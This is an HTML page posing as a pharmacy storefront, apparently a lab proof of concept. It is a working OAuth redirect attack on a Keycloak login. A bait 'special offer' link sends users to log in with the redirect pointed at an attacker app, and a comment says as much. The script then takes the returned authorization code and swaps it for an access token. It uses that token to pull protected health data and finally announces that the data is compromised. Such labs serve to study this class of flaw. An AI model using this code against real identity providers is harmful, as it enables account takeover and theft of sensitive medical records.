<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Keycloak Authentication</title>
<style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        header {
            background-color: #007bff;
            color: #fff;
            padding: 20px;
            text-align: center;
        }
        nav {
            background-color: #f8f9fa;
            padding: 10px;
            text-align: center;
        }
        nav a {
            text-decoration: none;
            color: #333;
            padding: 10px;
        }
        nav a:hover {
            background-color: #007bff;
            color: #fff;
        }
        section {
            padding: 20px;
        }
        footer {
            background-color: #007bff;
            color: #fff;
            text-align: center;
            padding: 10px;
            position: fixed;
            bottom: 0;
            width: 100%;
        }
    </style>
</head>
<body>
    
<header>
        <h1>Welcome to Our Chemist Store</h1>
    </header>

    <nav>
        <a href="#">Home</a>
        <a href="#">Products</a>
        <a href="#">Services</a>
        <a href="#">Contact</a>
    </nav>

    <section>
        <h2>About Us</h2>
        <p>We provide a wide range of pharmaceutical products and services to meet the healthcare needs of our customers.</p>
        <p>Our store offers:</p>
        <ul>
            <li>Prescription medications</li>
            <li>Over-the-counter drugs</li>
            <li>Healthcare products</li>
            <li>Medical equipment</li>
            <li>Consultation services</li>
        </ul>
    </section>

    <footer>
        &copy; 2024 Chemist Store. All rights reserved.
    </footer>



<h1></h1>


<p style="color: red;">Special offer! Click <a href="#" onclick="redirectToOffer()">here</a> for details.</p>   
<h2 id ="compromise"> </h2>	
  <pre id="json-response"></pre>

  <script>
    // Function to extract query parameters from URL
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      const regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
        results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    // Function to exchange authorization code for token
     function exchangeCodeForToken(code) {
    const tokenEndpoint = 'http://192.168.56.10:8080/auth/realms/corporate/protocol/openid-connect/token';
	const clientId = 'vuln';
	var accessToken;
 var params = 'grant_type=authorization_code';
    params += '&code=' + code;
    params += '&client_id=' + clientId;
    params += '&redirect_uri=' + document.location.href.split('?')[0];

	var req = new XMLHttpRequest();
    	req.onreadystatechange = function() {
        if (req.readyState === 4) {
            var response = JSON.parse(req.responseText);
	   // accessToken = response['access_token'];
	     setState('accessToken', response['access_token']);
           // setOutput('output-response', req.responseText);

            
        }
    }
    req.open('POST', tokenEndpoint, true);
    req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

    req.send(params);

	//return accessToken;

    }


//change the href link to allow the redirection to work and load the malicious app rather than the original one
function redirectToOffer() {
         alert('Please log in using keycloak account to view the offer.');
	 window.location.href = 'http://keycloakserverIP:8080/auth/realms/realm-name/protocol/openid-connect/auth?client_id=clientID&response_type=code&redirect_uri=attacker-appURL/&scope=openid '

                   
        }



    // Function to make authenticated request to backend API
    function fetchDataWithToken() {
      const backendUrl = 'http://localhost:3000/secured';
       var data;
      var req = new XMLHttpRequest();
      req.onreadystatechange = function() {
                if (req.readyState === 4) {
			setOutput('json-response', req.responseText);
                }
            }
            req.open('GET', backendUrl, true);
            req.setRequestHeader('Authorization', 'Bearer ' + state.accessToken);
	 //   setOutput('output-backendRequest', state.discovery['invokeservice_endpoint'] + '<br/><br/>' + 'Authorization: Bearer ' + state.accessToken);


            req.send();
		document.getElementById('compromise').innerText =  "!!!Your health data is compromised!!!";
	        document.getElementById('json-response').innerText =  JSON.stringify(data, null, 2);
    }
function setState(key, value) {
    state[key] = value;
    localStorage.setItem('state', JSON.stringify(state));
}

function setOutput(id, value) {
    if (typeof value === 'object') {
        value = JSON.stringify(value, null, 2)
    } else if (value.startsWith('{')) {
        value = JSON.stringify(JSON.parse(value), null, 2)
    }
    document.getElementById(id).innerHTML = value;
}

function loadState() {
   var s = localStorage.getItem('state');
   if (s) {
       return JSON.parse(s);
   } 
}
	var state = loadState();

    // Entry point - handle callback from Keycloak
    window.addEventListener('load', async () => {

      const code = getParameterByName('code');
      if (code) {
        try {
          exchangeCodeForToken(code);
          fetchDataWithToken();
        } catch (error) {
          console.error('Error:', error);
        }
      }
    });
  </script>
</body>
</html>
